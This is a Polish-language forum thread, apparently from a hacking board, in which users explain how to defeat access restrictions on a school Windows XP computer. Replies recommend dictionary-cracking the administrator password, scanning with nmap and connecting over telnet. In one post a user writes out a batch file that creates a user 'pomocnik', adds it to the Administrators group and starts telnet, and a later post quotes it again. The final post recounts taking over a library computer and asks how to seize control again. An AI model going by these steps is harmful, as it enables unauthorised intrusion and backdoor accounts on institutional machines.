Pokaż wyniki 1 do 10 z 15

Temat: rejestr w windows xp

Hybrid View

Previous Post Previous Post   Next Post Next Post
  1. #1
    Zarejestrowany
    Sep 2006
    Skąd
    Warszawa
    Postów
    137

    Domyślnie rejestr w windows xp

    witam mam pewien problem dotyczący rejestru i innych usłg, w szkolnym komputerze jest zablokowany dostęp do czegokolwiek, mam program o nazwie WindConf, słuzy on do wyłączania róznego rodzaju usług lub właczania ,ale na tym szkolnym komputerze niechce działac nie wiem czemu. Macie jakis sposób na włączenie wiersza poleceń lub edycji rejestru , te 2 żeczy potrzebuje najbardziej. Niestety nie mam kona admina, własciwie gdybym je miał niebyło by pytania.Acha na komputerze jest jeszcze zainsalowany antywirus arcavir. prosze o pomoc.

    pozdrawiam

    michalski

  2. #2
    Zarejestrowany
    Feb 2007
    Skąd
    w domu :D
    Postów
    535

    Domyślnie

    Witam

    Zalezy co chcesz zrobic; do czego ci wiersz polecen?:
    Wiersz polecen mozna uruchomic przy starcie systemu ale nie wiem czy to cos ci pomoze ale spróbuj komp sie uruchamia Alt+F8
    PS:hasło do admina mozna złamac xD

    pozdrawiam

  3. #3
    Zarejestrowany
    Sep 2006
    Skąd
    Warszawa
    Postów
    137

    Domyślnie mały problem

    Eryk dzieki za odp, masz racje mozna wejsc do konsoli podczas uruchamiania systemu ale trzeba miec hasło admina, masz jakis pomysł jaką metodą to połamać, mogłbym skopiowac plik sam i go rozkodować w domu ale musiałbym uruchomic linuxa bo z windy nie da sie z tym plikiem nic zrobic , a nie ma szans na uruchomienie linucha bo za długo to trwa, nauczycieele z tej szkoły są kiepscy ale nie aż tak. poradz jaką metodą?

    pozdrawiam

    michalski

  4. #4
    Zarejestrowany
    Feb 2007
    Skąd
    w domu :D
    Postów
    535

    Domyślnie

    Hasło możesz złamac Słownikiem<dopasowac>kilka tematów w tył dalem Temat z filmem jak złamac hasło do administratora na komputerze zdalnym, napewno ci pomoże
    Odpalasz w domu linuxa i do boju łamiesz hasło szkolne potem albo sie łączysz telnetem i bierzesz co ci trzeba xD albo poprostu w szkole w tryb administracyjny wchodzisz podajesz hasło i po sprawie przypominam ze maszyna musi miec otwarty port telnet 23, nmap polecam jesli ma zamkniety to go otwórz ale jak to otworzyc to nie wiem poczekaj na innych użytkowników tego forum bardziej doświadczonych

    pozdrawiam

  5. #5
    Zarejestrowany
    Sep 2006
    Skąd
    Warszawa
    Postów
    137

    Domyślnie dzieki

    dzieki bardzo eryk , juz wszystko jasne, zaraz zabiore sie do dzieła, wiem jak otworzyc port 23,wystarczy kilka komend w notatniku i zapis w formacie bat.
    nizej podaje ci ten skłądnie polecenia, gdybys potrzebował, acha przez polecenia bata mozesz uruchamiac wiele procesów systemowych i sieciowych.


    skłądnia polecenia

    net config server\nnet user pomocnik /active:yes\n
    net user pomocnik haslo\nnet localgroup TelnetClients /add\n
    net localgroup Administratorzy pomocnik /add\n
    net localgroup TelnetClients pomocnik /add\n
    net start telnet\n

    net user pomocnik haslo - gdzie pomocnik to username a haslo to haslo

    wszystko zapisuje sie do pliku .bat



    pozdrawiam

    michalski

  6. #6
    Zarejestrowany
    Feb 2007
    Skąd
    w domu :D
    Postów
    535

    Domyślnie

    dzieki przyda sie napewno

    pozdrawiam

  7. #7

    Domyślnie

    Cytat Napisał michalski007 Zobacz post


    skłądnia polecenia

    net config server\nnet user pomocnik /active:yes\n
    net user pomocnik haslo\nnet localgroup TelnetClients /add\n
    net localgroup Administratorzy pomocnik /add\n
    net localgroup TelnetClients pomocnik /add\n
    net start telnet\n

    net user pomocnik haslo - gdzie pomocnik to username a haslo to haslo

    wszystko zapisuje sie do pliku .bat



    pozdrawiam

    michalski
    czy ktos może powiedziec co to za polecenia równiez opcje

  8. #8

    Domyślnie

    Cytat Napisał eryk Zobacz post
    Witam

    Zalezy co chcesz zrobic; do czego ci wiersz polecen?:
    Wiersz polecen mozna uruchomic przy starcie systemu ale nie wiem czy to cos ci pomoze ale spróbuj komp sie uruchamia Alt+F8
    PS:hasło do admina mozna złamac xD

    pozdrawiam
    mam pytanie do czego służy skrót klawiszowy ATL+F8 i w którym momencie należy kliknąć :?:

  9. #9
    Zarejestrowany
    Dec 2006
    Skąd
    Kielce
    Postów
    1,767

    Domyślnie

    heh nio pytanie prawnie na temat i praktycznie nadające się do Google - ale niech będzie:

    skrót ten służy do wejścia w zaawansowane menu uruchamiania systemu Windows i należy go nacisnąć podczas startu systemu zaraz na początku kiedy jest czarny ekran a na dole przelatuje taki biały wąski paseczek...
    Agencja reklamy kielce (mały kilkudniowy case pozycjonerski )

  10. Talking duży kłopot

    Czejść
    Mam poważny problem.Zaczęło się od tego że złamałem hasło w bibliotece i zostałem adminem{bo ja nie mam neta} .Po puł roku kolesiuwy z biblioteki pokonały moje hasło i teraz mają zainstalowany taki genialny program FreeShield Parental Control który wiąże mi ręce .Są windowsy ,system awaryjny nie działa bo nie mogę strzałek używać,90% stronek zablokowanych ,po za tym cmd działa i rejestr.Ma ktoś pomysł jak znowu przejąć kontrole ?A mam w chacie Ubuntu ale wole jakiś inny sposub na obejście niż łamanie hasła.Licze na waszą pomoc
    THX

Podobne wątki

  1. Windows Vista
    By freek in forum Windows
    Odpowiedzi: 14
    Autor: 08-30-2007, 15:51
  2. Odpowiedzi: 14
    Autor: 04-10-2007, 13:19
  3. gry w windows
    By benny81 in forum Hacking
    Odpowiedzi: 2
    Autor: 02-16-2007, 11:26
  4. Windows i Linux
    By klucha1 in forum Security
    Odpowiedzi: 3
    Autor: 01-02-2007, 16:33
  5. express rejestr
    By sprint1 in forum Hacking
    Odpowiedzi: 1
    Autor: 09-22-2006, 10:56

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj